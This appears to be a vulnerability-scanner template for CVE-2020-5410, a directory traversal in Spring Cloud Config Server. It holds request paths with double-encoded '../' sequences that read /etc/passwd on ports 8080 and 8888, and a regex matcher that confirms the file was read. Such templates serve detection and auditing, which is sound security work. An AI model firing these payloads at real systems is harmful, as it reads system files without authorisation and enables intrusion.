id: CVE-2020-5410 info: name: Directory Traversal in Spring Cloud Config Server author: mavericknerd severity: high requests: - method: GET path: - "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" - "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body